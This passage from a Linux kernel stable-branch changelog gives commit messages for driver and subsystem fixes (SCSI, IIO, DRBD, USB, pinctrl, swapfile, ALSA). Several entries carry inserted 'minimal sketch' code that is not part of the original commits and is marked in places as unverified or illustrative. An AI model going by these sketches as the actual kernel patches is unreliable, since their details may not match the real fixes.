Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
James Hogan [Tue, 25 Oct 2016 15:11:12 +0000 (16:11 +0100)]
KVM: MIPS: Precalculate MMIO load resume PC
commit e1e575f6b026734be3b1f075e780e91ab08ca541 upstream.
The advancing of the PC when completing an MMIO load is done before
re-entering the guest, i.e. before restoring the guest ASID. However if
the load is in a branch delay slot it may need to access guest code to
read the prior branch instruction. This isn't safe in TLB mapped code at
the moment, nor in the future when we'll access unmapped guest segments
using direct user accessors too, as it could read the branch from host
user memory instead.
Therefore calculate the resume PC in advance while we're still in the
right context and save it in the new vcpu->arch.io_pc (replacing the no
longer needed vcpu->arch.pending_load_cause), and restore it on MMIO
completion.
Fixes:
e685c689f3a8 ("KVM/MIPS32: Privileged instruction/target branch emulation.")
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: linux-mips@linux-mips.org
Cc: kvm@vger.kernel.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
[james.hogan@imgtec.com: Backport to 3.18..4.4]
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Sreekanth Reddy [Fri, 28 Oct 2016 04:39:12 +0000 (10:09 +0530)]
scsi: mpt3sas: Fix for block device of raid exists even after deleting raid disk
commit
6d3a56ed098566bc83d6c2afa74b4199c12ea074 upstream.
While merging mpt3sas & mpt2sas code, we added the is_warpdrive check
condition on the wrong line
---------------------------------------------------------------------------
scsih_target_alloc(struct scsi_target *starget)
		sas_target_priv_data->handle = raid_device->handle;
		sas_target_priv_data->sas_address = raid_device->wwid;
		sas_target_priv_data->flags |= MPT_TARGET_FLAGS_VOLUME;
-		raid_device->starget = starget;
+		sas_target_priv_data->raid_device = raid_device;
+		if (ioc->is_warpdrive)
+			raid_device->starget = starget;
	}
	spin_unlock_irqrestore(&ioc->raid_device_lock, flags);
	return 0;
------------------------------------------------------------------------------
That check should be for the line sas_target_priv_data->raid_device =
raid_device;
Due to above hunk, we are not initializing raid_device's starget for
raid volumes, and so during raid disk deletion driver is not calling
scsi_remove_target() API as driver observes starget field of
raid_device's structure as NULL.
Signed-off-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Fixes:
7786ab6aff9 ("mpt3sas: Ported WarpDrive product SSS6200 support")
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Bill Kuzeja [Fri, 21 Oct 2016 20:45:27 +0000 (16:45 -0400)]
scsi: qla2xxx: Fix scsi scan hang triggered if adapter fails during init
commit
a5dd506e1584e91f3e7500ab9a165aa1b49eabd4 upstream.
A system can get hung task timeouts if a qlogic board fails during
initialization (if the board breaks again or fails the init). The hang
involves the scsi scan.
In a nutshell, since commit
beb9e315e6e0 ("qla2xxx: Prevent removal and
board_disable race"):
...it is possible to have freed ha (base_vha->hw) early by a call to
qla2x00_remove_one when pdev->enable_cnt equals zero:
	if (!atomic_read(&pdev->enable_cnt)) {
		scsi_host_put(base_vha->host);
		kfree(ha);
		pci_set_drvdata(pdev, NULL);
		return;
Almost always, the scsi_host_put above frees the vha structure
(attached to the end of the Scsi_Host we're putting) since it's the last
put, and life is good. However, if we are entering this routine because
the adapter has broken sometime during initialization AND a scsi scan is
already in progress (and has done its own scsi_host_get), vha will not
be freed. What's worse, the scsi scan will access the freed ha structure
through qla2xxx_scan_finished:
	if (time > vha->hw->loop_reset_delay * HZ)
		return 1;
The scsi scan keeps checking to see if a scan is complete by calling
qla2xxx_scan_finished. There is a timeout value that limits the length
of time a scan can take (hw->loop_reset_delay, usually set to 5
seconds), but this definition is in the data structure (hw) that can get
freed early.
This can yield unpredictable results, the worst of which is that the
scsi scan can hang indefinitely. This happens when the freed structure
gets reused and loop_reset_delay gets overwritten with garbage, which
the scan obliviously uses as its timeout value.
The fix for this is simple: at the top of qla2xxx_scan_finished, check
for the UNLOADING bit in the vha structure (vha is not freed at this
point). If UNLOADING is set, we exit the scan for this adapter
immediately, skipping this last reference to the ha structure, and
continue on.
This problem is hard to hit, but I have run into it doing negative
testing many times now (with a test specifically designed to bring it
out), so I can verify that this fix works. My testing has been against a
RHEL7 driver variant, but the bug and patch are equally relevant to
the upstream driver.
Fixes:
beb9e315e6e0 ("qla2xxx: Prevent removal and board_disable race")
Signed-off-by: Bill Kuzeja <william.kuzeja@stratus.com>
Acked-by: Himanshu Madhani <himanshu.madhani@cavium.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
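A minimal sketch of the check described above, placed at the top of qla2xxx_scan_finished(); the flag and field names follow the commit text and common qla2xxx conventions but are not verified against any particular tree, and the final readiness check is only illustrative:
static int qla2xxx_scan_finished(struct Scsi_Host *shost, unsigned long time)
{
	scsi_qla_host_t *vha = shost_priv(shost);

	/* vha itself is still valid here; bail out before dereferencing
	 * vha->hw, which may already have been freed if the adapter broke
	 * during initialization */
	if (test_bit(UNLOADING, &vha->dpc_flags))
		return 1;

	if (time > vha->hw->loop_reset_delay * HZ)
		return 1;

	/* illustrative: report completion once the loop is ready */
	return atomic_read(&vha->loop_state) == LOOP_READY;
}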
Song Hongyan [Tue, 25 Oct 2016 01:06:03 +0000 (01:06 +0000)]
iio: orientation: hid-sensor-rotation: Add PM function (fix non working driver)
commit
8af644a7d6846f48d6b72be5d4a3c6eb16bd33c8 upstream.
This fix makes newer ISH hubs work. Previous ones worked by lucky
coincidence.
The rotation sensor does not work due to a missing PM function.
Add the common HID sensor IIO PM function for the rotation sensor.
Further clarification from Srinivas:
If CONFIG_PM is not defined, this prevents the sensor from
functioning. So the commit referenced in the Fixes tag below caused this.
This sensor was supposed to be always on to trigger wake up in prior
external hubs. But with the new ISH hub this is not the case.
Signed-off-by: Song Hongyan <hongyan.song@intel.com>
Fixes:
2b89635e9a9e ("iio: hid_sensor_hub: Common PM functions")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
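A sketch of the kind of hookup described above, assuming the shared hid_sensor_pm_ops exported by the common hid-sensors code; the driver name and the stubbed probe/remove callbacks are illustrative only:
#include <linux/module.h>
#include <linux/platform_device.h>

/* exported by the common hid-sensors trigger code (assumption) */
extern const struct dev_pm_ops hid_sensor_pm_ops;

static int hid_dev_rot_probe(struct platform_device *pdev)  { return 0; } /* stub */
static int hid_dev_rot_remove(struct platform_device *pdev) { return 0; } /* stub */

static struct platform_driver hid_dev_rot_platform_driver = {
	.driver = {
		.name	= "hid-dev-rot",	/* illustrative */
		.pm	= &hid_sensor_pm_ops,	/* the missing PM hookup */
	},
	.probe	= hid_dev_rot_probe,
	.remove	= hid_dev_rot_remove,
};
module_platform_driver(hid_dev_rot_platform_driver);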
Song Hongyan [Tue, 25 Oct 2016 01:30:07 +0000 (01:30 +0000)]
iio: hid-sensors: Increase the precision of scale to fix wrong reading interpretation.
commit
6f77199e9e4b84340c751c585691d7642a47d226 upstream.
While testing, it was observed that on some platforms the scale value
from iio sysfs for the gyroscope is always 0 (e.g. Yoga 260). This results
in the final angular velocity component values being zero.
This is caused by insufficient precision of the scale value displayed in sysfs.
If the precision is changed to nano from current micro, then this is
sufficient to display the scale value on this platform.
Since this can be a problem for all other HID sensors, increase scale
precision of all HID sensors to nano from current micro.
Results on Yoga 260:
name       scale before   scale now
--------------------------------------------
gyro_3d    0.000000       0.000000174
als        0.001000       0.001000000
magn_3d    0.000001       0.000001000
accel_3d   0.000009       0.000009806
Signed-off-by: Song Hongyan <hongyan.song@intel.com>
Acked-by: Srinivas Pandruvada <srinivas.pandruvada@linux.intel.com>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
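For illustration, this is how an IIO read_raw path can report the gyroscope scale from the table above with nano precision; the IIO_VAL_* return codes come from the IIO core, while the helper name is hypothetical:
#include <linux/iio/iio.h>

/* Report a scale of 0.000000174; with IIO_VAL_INT_PLUS_MICRO the same
 * value would have been shown as 0.000000 in sysfs. */
static int gyro_3d_read_scale(int *val, int *val2)
{
	*val  = 0;	/* integer part */
	*val2 = 174;	/* fractional part, in units of 10^-9 */
	return IIO_VAL_INT_PLUS_NANO;
}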
Scott Wood [Mon, 17 Oct 2016 18:42:23 +0000 (13:42 -0500)]
clk: qoriq: Don't allow CPU clocks higher than starting value
commit
7c1c5413a7bdf1c9adc8d979521f1b8286366aef upstream.
The boot-time frequency of a CPU is considered its rated maximum, as we
have no other source of such information. However, this was previously
only used for chips with 80% restrictions on secondary PLLs. This
usually wasn't a problem because most chips/configs boot with a divider
of /1, with other dividers being used only for dynamic frequency
reduction. However, at least one config (LS1021A at less than 1 GHz)
uses a different divider for top speed. This was causing cpufreq to set
a frequency beyond the chip's rated speed.
This is fixed by applying a 100%-of-initial-speed limit to all CPU PLLs,
similar to the existing 80% limit that only applied to some.
Signed-off-by: Scott Wood <oss@buserror.net>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Azael Avalos [Thu, 25 Aug 2016 18:50:55 +0000 (12:50 -0600)]
toshiba-wmi: Fix loading the driver on non Toshiba laptops
commit
1c80e9603fe8341ed5bea696747d07083d5e0476 upstream.
Bug 150611 uncovered that the WMI ID used by the toshiba-wmi driver
is not Toshiba-specific, and as such, the driver was being loaded
on non-Toshiba laptops too.
This patch adds a DMI matching list checking for TOSHIBA as the
vendor, and refuses to load if it is not.
Also the WMI GUID was renamed, dropping the TOSHIBA_ prefix, to
better reflect that such GUID is not a Toshiba specific one.
Signed-off-by: Azael Avalos <coproscefalo@gmail.com>
Signed-off-by: Darren Hart <dvhart@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
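A minimal sketch of such a DMI vendor check using the standard DMI helpers; the table contents and the init function are illustrative:
#include <linux/init.h>
#include <linux/errno.h>
#include <linux/dmi.h>

static const struct dmi_system_id toshiba_wmi_dmi_table[] __initconst = {
	{
		.ident = "Toshiba laptop",
		.matches = {
			DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
		},
	},
	{ }
};

static int __init toshiba_wmi_init(void)
{
	/* refuse to load on anything that is not a Toshiba machine */
	if (!dmi_check_system(toshiba_wmi_dmi_table))
		return -ENODEV;
	/* ... register the WMI notifier as before ... */
	return 0;
}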
Richard Weinberger [Wed, 9 Nov 2016 21:52:58 +0000 (22:52 +0100)]
drbd: Fix kernel_sendmsg() usage - potential NULL deref
commit
d8e9e5e80e882b4f90cba7edf1e6cb7376e52e54 upstream.
Don't pass a size larger than iov_len to kernel_sendmsg().
Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
returns with rv < size.
DRBD as external module has been around in the kernel 2.4 days already.
We used to be compatible to 2.4 and very early 2.6 kernels,
we used to use
rv = sock_sendmsg(sock, &msg, iov.iov_len);
then later changed to
rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
when we should have used
rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
tcp_sendmsg() used to totally ignore the size parameter.
57be5bd ip: convert tcp_sendmsg() to iov_iter primitives
changes that, and exposes our long standing error.
Even with this error exposed, to trigger the bug, we would need to have
an environment (config or otherwise) causing us to not use sendpage()
for larger transfers, a failing connection, and have it fail "just at the
right time". Apparently that was unlikely enough for most, so this went
unnoticed for years.
Still, it is known to trigger at least some of these,
and suspected for the others:
[0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
[1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
[2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
[3] https://ubuntuforums.org/showthread.php?t=2336150
[4] http://e2.howsolveproblem.com/i/1175162/
This should go into 4.9,
and into all stable branches since and including v4.0,
which is the first to contain the exposing change.
It is correct for all stable branches older than that as well
(which contain the DRBD driver; which is 2.6.33 and up).
It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
we dropped the comment block immediately preceding the kernel_sendmsg().
Fixes:
b411b3637fa7 ("The DRBD driver")
Cc: viro@zeniv.linux.org.uk
Cc: christoph.lechleitner@iteg.at
Cc: wolfgang.glas@iteg.at
Reported-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Tested-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Signed-off-by: Richard Weinberger <richard@nod.at>
[changed oneliner to be "obvious" without context; more verbose message]
Signed-off-by: Lars Ellenberg <lars.ellenberg@linbit.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Felipe Balbi [Tue, 1 Nov 2016 11:20:22 +0000 (13:20 +0200)]
usb: gadget: u_ether: remove interrupt throttling
commit
fd9afd3cbe404998d732be6cc798f749597c5114 upstream.
According to Dave Miller "the networking stack has a
hard requirement that all SKBs which are transmitted
must have their completion signalled in a finite
amount of time. This is because, until the SKB is
freed by the driver, it holds onto socket,
netfilter, and other subsystem resources."
In summary, this means that using TX IRQ throttling
for the networking gadgets is, at least, complex and
we should avoid it for the time being.
Reported-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Tested-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Suggested-by: David Miller <davem@davemloft.net>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Johan Hovold [Tue, 8 Nov 2016 12:10:57 +0000 (13:10 +0100)]
USB: cdc-acm: fix TIOCMIWAIT
commit
18266403f3fe507f0246faa1d5432333a2f139ca upstream.
The TIOCMIWAIT implementation would return -EINVAL if any of the three
supported signals were included in the mask.
Instead of returning an error in case TIOCM_CTS is included, simply
drop the mask check completely, which is in accordance with how other
drivers implement this ioctl.
Fixes:
5a6a62bdb925 ("cdc-acm: add TIOCMIWAIT")
Signed-off-by: Johan Hovold <johan@kernel.org>
Acked-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Marc Dietrich [Tue, 1 Nov 2016 12:59:40 +0000 (13:59 +0100)]
staging: nvec: remove managed resource from PS2 driver
commit
68fae2f3df455f53d0dfe33483a49020b3b758f3 upstream.
This basically reverts commit
e534f3e9 ("staging:nvec: Introduce the use of
the managed version of kzalloc"). The serio struct should never be managed
because it is refcounted; managing it leads to a double-free oops on module
removal.
Signed-off-by: Marc Dietrich <marvin24@gmx.de>
Fixes:
e534f3e9429f ("staging:nvec: Introduce the use of the managed version of kzalloc")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
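A minimal sketch of the ownership rule behind the revert; the helper name is illustrative:
#include <linux/serio.h>
#include <linux/slab.h>

static struct serio *nvec_ps2_alloc_serio(void)
{
	/* NOT devm_kzalloc(): once registered, the serio core owns this
	 * refcounted object and frees it via serio_unregister_port(), so a
	 * managed allocation would be freed a second time on driver remove */
	return kzalloc(sizeof(struct serio), GFP_KERNEL);
}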
Paul Fertser [Thu, 27 Oct 2016 14:22:09 +0000 (17:22 +0300)]
Revert "staging: nvec: ps2: change serio type to passthrough"
commit
17c1c9ba15b238ef79b51cf40d855c05b58d5934 upstream.
This reverts commit
36b30d6138f4677514aca35ab76c20c1604baaad.
This is necessary to detect paz00 (ac100) touchpad properly as one
speaking ETPS/2 protocol. Without it X.org's synaptics driver doesn't
work as the touchpad is detected as an ImPS/2 mouse instead.
Commit
ec6184b1c717b8768122e25fe6d312f609cc1bb4 changed the way
auto-detection is performed on ports marked as pass through and made the
issue apparent.
A pass through port is an additional PS/2 port used to connect a slave
device to a master device that is using PS/2 to communicate with the
host (so slave's PS/2 communication is tunneled over master's PS/2
link). "Synaptics PS/2 TouchPad Interfacing Guide" describes such a
setup (PS/2 PASS-THROUGH OPTION section).
Since paz00's embedded controller is not connected to a PS/2 port
itself, the PS/2 interface it exposes is not a pass-through one.
Signed-off-by: Paul Fertser <fercerpav@gmail.com>
Acked-by: Marc Dietrich <marvin24@gmx.de>
Fixes:
36b30d6138f4 ("staging: nvec: ps2: change serio type to passthrough")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Paul Fertser [Thu, 27 Oct 2016 14:22:08 +0000 (17:22 +0300)]
drivers: staging: nvec: remove bogus reset command for PS/2 interface
commit
d8f8a74d5fece355d2234e1731231d1aebc66b38 upstream.
This command was sent behind serio's back and the answer to it was
confusing the atkbd probe function, which led to the elantech touchpad
being detected as a keyboard.
To prevent this from happening just let every party do its part of the
job.
Signed-off-by: Paul Fertser <fercerpav@gmail.com>
Acked-by: Marc Dietrich <marvin24@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Arnd Bergmann [Mon, 24 Oct 2016 15:22:01 +0000 (17:22 +0200)]
staging: iio: ad5933: avoid uninitialized variable in error case
commit
34eee70a7b82b09dbda4cb453e0e21d460dae226 upstream.
The ad5933_i2c_read function returns an error code to indicate
whether it could read data or not. However ad5933_work() ignores
this return code and just accesses the data unconditionally,
which gets detected by gcc as a possible bug:
drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work':
drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized]
This adds minimal error handling so we only evaluate the
data if it was correctly read.
Link: https://patchwork.kernel.org/patch/8110281/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
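A sketch of the minimal error handling described above; the register name, status flag and state structure are assumptions modelled on the driver and may differ in detail:
static void ad5933_work_sketch(struct ad5933_state *st)
{
	unsigned char status;
	int ret;

	ret = ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status);
	if (ret < 0)
		return;		/* never evaluate 'status' after a failed read */

	if (status & AD5933_STAT_DATA_VALID) {
		/* ... read the conversion result and push it to the buffer ... */
	}
}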
Mika Westerberg [Mon, 31 Oct 2016 14:57:33 +0000 (16:57 +0200)]
pinctrl: cherryview: Prevent possible interrupt storm on resume
commit
d2cdf5dc58f6970e9d9d26e47974c21fe87983f3 upstream.
When the system is suspended to S3 the BIOS might re-initialize certain
GPIO pins back to their original state or it may re-program interrupt mask
of others. For example Acer TravelMate B116-M had BIOS bug where certain
GPIO pin (MF_ISH_GPIO_5) was programmed to trigger on high level, and the
pin state was high once the BIOS gave control to the OS on resume.
This triggers lots of messages like:
irq 117, desc: ffff88017a61e600, depth: 1, count: 0, unhandled: 0
->handle_irq(): ffffffff8109b613, handle_bad_irq+0x0/0x1e0
->irq_data.chip(): ffffffffa0020180, chv_pinctrl_exit+0x2d84/0x12 [pinctrl_cherryview]
->action(): (null)
IRQ_NOPROBE set
We reset the mask back to a known state in chv_pinctrl_resume(), but that is
called only after device interrupts have already been enabled.
Now, this particular issue was fixed by upgrading the BIOS to the latest
version (v1.23), but not everybody upgrades their BIOS, so we fix it up in the
driver as well.
Prevent the possible interrupt storm by moving the suspend and resume hooks to
be called at _noirq time instead. Since device interrupts are still
disabled, we can restore the mask back to a known state before the interrupt
storm happens.
Reported-by: Christian Steiner <christian.steiner@outlook.de>
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
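A sketch of moving the hooks to _noirq time with the standard dev_pm_ops helper; the callback bodies are stubs standing in for the driver's existing save/restore code:
#include <linux/pm.h>

static int chv_pinctrl_suspend_noirq(struct device *dev)
{
	/* save pad and interrupt-mask context (driver specific) */
	return 0;
}

static int chv_pinctrl_resume_noirq(struct device *dev)
{
	/* restore the interrupt mask while device IRQs are still disabled */
	return 0;
}

static const struct dev_pm_ops chv_pinctrl_pm_ops = {
	SET_NOIRQ_SYSTEM_SLEEP_PM_OPS(chv_pinctrl_suspend_noirq,
				      chv_pinctrl_resume_noirq)
};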
Mika Westerberg [Mon, 31 Oct 2016 14:57:32 +0000 (16:57 +0200)]
pinctrl: cherryview: Serialize register access in suspend/resume
commit
56211121c0825cd188caad05574fdc518d5cac6f upstream.
If async suspend is enabled, the driver may access registers concurrently
with another instance which may fail because of the bug in Cherryview GPIO
hardware. Prevent this by taking the shared lock while accessing the
hardware in suspend and resume hooks.
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Vineet Gupta [Mon, 31 Oct 2016 21:09:52 +0000 (14:09 -0700)]
ARC: timer: rtc: implement read loop in "C" vs. inline asm
commit
922cc171998ac3dbe74d57011ef7ed57e9b0d7df upstream.
The current code doesn't even compile, as somehow the inline assembly
can't see the register names defined as ARC_RTC_*.
I'm pretty sure it worked when I first got it merged, but the tools were
definitely different then.
So better to write this in "C" anyways.
Acked-by: Daniel Lezcano <daniel.lezcano@linaro.org>
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
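A generic C sketch of one common way to read a split 64-bit free-running counter without inline assembly: re-read the high half until it is stable. The auxiliary register names are assumptions, and the real driver may rely on a hardware status bit instead:
#include <linux/types.h>
#include <asm/arcregs.h>	/* read_aux_reg() and RTC register numbers (assumed) */

static u64 rtc_read_sketch(void)
{
	u32 lo, hi, tmp;

	do {
		hi  = read_aux_reg(AUX_RTC_HIGH);
		lo  = read_aux_reg(AUX_RTC_LOW);
		tmp = read_aux_reg(AUX_RTC_HIGH);
	} while (hi != tmp);	/* the high half rolled over mid-read: retry */

	return ((u64)hi << 32) | lo;
}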
Michael Holzheu [Tue, 25 Oct 2016 14:24:28 +0000 (16:24 +0200)]
s390/hypfs: Use get_free_page() instead of kmalloc to ensure page alignment
commit
237d6e6884136923b6bd26d5141ebe1d065960c9 upstream.
Since commit
d86bd1bece6f ("mm/slub: support left redzone") it is no longer
guaranteed that kmalloc(PAGE_SIZE) returns page aligned memory.
After the above commit we get an error for diag224 because aligned
memory is required. This leads to the following user visible error:
# mount none -t s390_hypfs /sys/hypervisor/
mount: unknown filesystem type 's390_hypfs'
# dmesg | grep hypfs
hypfs.cccfb8: The hardware system does not provide all functions
required by hypfs
hypfs.7a79f0: Initialization of hypfs failed with rc=-61
Fix this problem and use get_free_page() instead of kmalloc() to get
correctly aligned memory.
Signed-off-by: Michael Holzheu <holzheu@linux.vnet.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
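A minimal sketch of the allocation change: grab a whole page, which is always naturally aligned, instead of relying on kmalloc(PAGE_SIZE) alignment (helper names are illustrative, and the real code may need additional GFP flags):
#include <linux/gfp.h>

static void *diag224_buf_alloc(void)
{
	/* page allocations are guaranteed to be page aligned */
	return (void *)__get_free_page(GFP_KERNEL);
}

static void diag224_buf_free(void *buf)
{
	free_page((unsigned long)buf);
}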
Andrey Ryabinin [Thu, 10 Nov 2016 18:46:38 +0000 (10:46 -0800)]
coredump: fix unfreezable coredumping task
commit
70d78fe7c8b640b5acfad56ad341985b3810998a upstream.
It may be impossible to freeze a coredumping task while it waits for
the 'core_state->startup' completion, because threads are frozen in
get_signal() before they get a chance to complete 'core_state->startup'.
Inability to freeze a task during suspend will cause suspend to fail.
Also CRIU uses cgroup freezer during dump operation. So with an
unfreezable task the CRIU dump will fail because it waits for a
transition from 'FREEZING' to 'FROZEN' state which will never happen.
Use freezer_do_not_count() to tell freezer to ignore coredumping task
while it waits for core_state->startup completion.
Link: http://lkml.kernel.org/r/1475225434-3753-1-git-send-email-aryabinin@virtuozzo.com
Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
Acked-by: Pavel Machek <pavel@ucw.cz>
Acked-by: Oleg Nesterov <oleg@redhat.com>
Cc: Alexander Viro <viro@zeniv.linux.org.uk>
Cc: Tejun Heo <tj@kernel.org>
Cc: "Rafael J. Wysocki" <rjw@rjwysocki.net>
Cc: Michal Hocko <mhocko@kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
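A minimal sketch of the wait wrapped in freezer_do_not_count()/freezer_count() as described above; the helper name is illustrative:
#include <linux/freezer.h>
#include <linux/completion.h>

static void coredump_wait_startup(struct completion *startup)
{
	freezer_do_not_count();		/* freezer ignores this task while it waits */
	wait_for_completion(startup);
	freezer_count();		/* rejoin freezer accounting; may freeze here */
}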
Jann Horn [Thu, 10 Nov 2016 18:46:19 +0000 (10:46 -0800)]
swapfile: fix memory corruption via malformed swapfile
commit
dd111be69114cc867f8e826284559bfbc1c40e37 upstream.
When root activates a swap partition whose header has the wrong
endianness, nr_badpages elements of badpages are swabbed before
nr_badpages has been checked, leading to a buffer overrun of up to 8GB.
This normally is not a security issue because it can only be exploited
by root (more specifically, a process with CAP_SYS_ADMIN or the ability
to modify a swap file/partition), and such a process can already e.g.
modify swapped-out memory of any other userspace process on the system.
Link: http://lkml.kernel.org/r/1477949533-2509-1-git-send-email-jann@thejh.net
Signed-off-by: Jann Horn <jann@thejh.net>
Acked-by: Kees Cook <keescook@chromium.org>
Acked-by: Jerome Marchand <jmarchan@redhat.com>
Acked-by: Johannes Weiner <hannes@cmpxchg.org>
Cc: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
Cc: Vlastimil Babka <vbabka@suse.cz>
Cc: Hugh Dickins <hughd@google.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
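A sketch of the reordered validation, assuming the union swap_header layout from <linux/swap.h>: the nr_badpages count is checked before the variable-length badpages[] array is swabbed:
#include <linux/swap.h>
#include <linux/swab.h>
#include <linux/errno.h>

static int swab_badpages_sketch(union swap_header *hdr)
{
	int i;

	swab32s(&hdr->info.version);
	swab32s(&hdr->info.last_page);
	swab32s(&hdr->info.nr_badpages);

	/* validate before touching the variable-length array */
	if (hdr->info.nr_badpages > MAX_SWAP_BADPAGES)
		return -EINVAL;

	for (i = 0; i < hdr->info.nr_badpages; i++)
		swab32s(&hdr->info.badpages[i]);

	return 0;
}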
Sean Young [Thu, 10 Nov 2016 16:44:49 +0000 (17:44 +0100)]
dib0700: fix nec repeat handling
commit
ba13e98f2cebd55a3744c5ffaa08f9dca73bf521 upstream.
When receiving a nec repeat, ensure the correct scancode is repeated
rather than a random value from the stack. This removes the need for
the bogus uninitialized_var() and also fixes the warnings:
drivers/media/usb/dvb-usb/dib0700_core.c: In function ‘dib0700_rc_urb_completion’:
drivers/media/usb/dvb-usb/dib0700_core.c:679: warning: ‘protocol’ may be used uninitialized in this function
[sean addon: So after writing the patch and submitting it, I've bought the
hardware on ebay. Without this patch you get random scancodes
on nec repeats, which the patch indeed fixes.]
Signed-off-by: Sean Young <sean@mess.org>
Tested-by: Sean Young <sean@mess.org>
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
murray foster [Sun, 9 Oct 2016 20:28:45 +0000 (13:28 -0700)]
ASoC: cs4270: fix DAPM stream name mismatch
commit
aa5f920993bda2095952177eea79bc8e58ae6065 upstream.
Mismatching stream names in DAPM route and widget definitions are
causing compilation errors. Fixing these names allows the cs4270
driver to compile and function.
[Errors must be at probe time not compile time -- broonie]
Signed-off-by: Murray Foster <mrafoster@gmail.com>
Acked-by: Paul Handrigan <Paul.Handrigan@cirrus.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Takashi Iwai [Sun, 30 Oct 2016 21:18:45 +0000 (22:18 +0100)]
ALSA: info: Limit the proc text input size
commit
027a9fe6835620422b6713892175716f3613dd9d upstream.
The ALSA proc handler currently allows writes of unlimited size, up to
the point where kmalloc() fails. But the write is basically supposed to
be only for small inputs, mostly one-line inputs, and we don't have to
handle very large sizes at all. Since a kmalloc() failure results in a
kernel warning, it's better to limit the size beforehand.
This patch adds a limit of 16kB, which must be large enough for the
currently existing code.
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
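A minimal sketch of the size cap, with an assumed constant name; pos and count are the usual proc write-handler arguments:
#include <linux/types.h>
#include <linux/errno.h>

#define SND_INFO_TEXT_MAX	(16 * 1024)	/* assumed name for the 16kB cap */

static int snd_info_check_write_size(loff_t pos, size_t count)
{
	if (pos < 0 || pos + count > SND_INFO_TEXT_MAX)
		return -EIO;	/* refuse before allocating anything */
	return 0;
}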
Takashi Iwai [Sun, 30 Oct 2016 21:13:19 +0000 (22:13 +0100)]
ALSA: info: Return error for invalid read/write
commit
6809cd682b82dfff47943850d1a8c714f971b5ca upstream.
Currently the ALSA proc handler allows a read or write even if the proc
file is write-only or read-only. It's mostly harmless: it does nothing
but allocate memory and ignore the input/output. But it doesn't tell
the user about the invalid use, and it's confusing and inconsistent
in comparison with other proc files.
This patch adds some sanity checks and lets the proc handler return
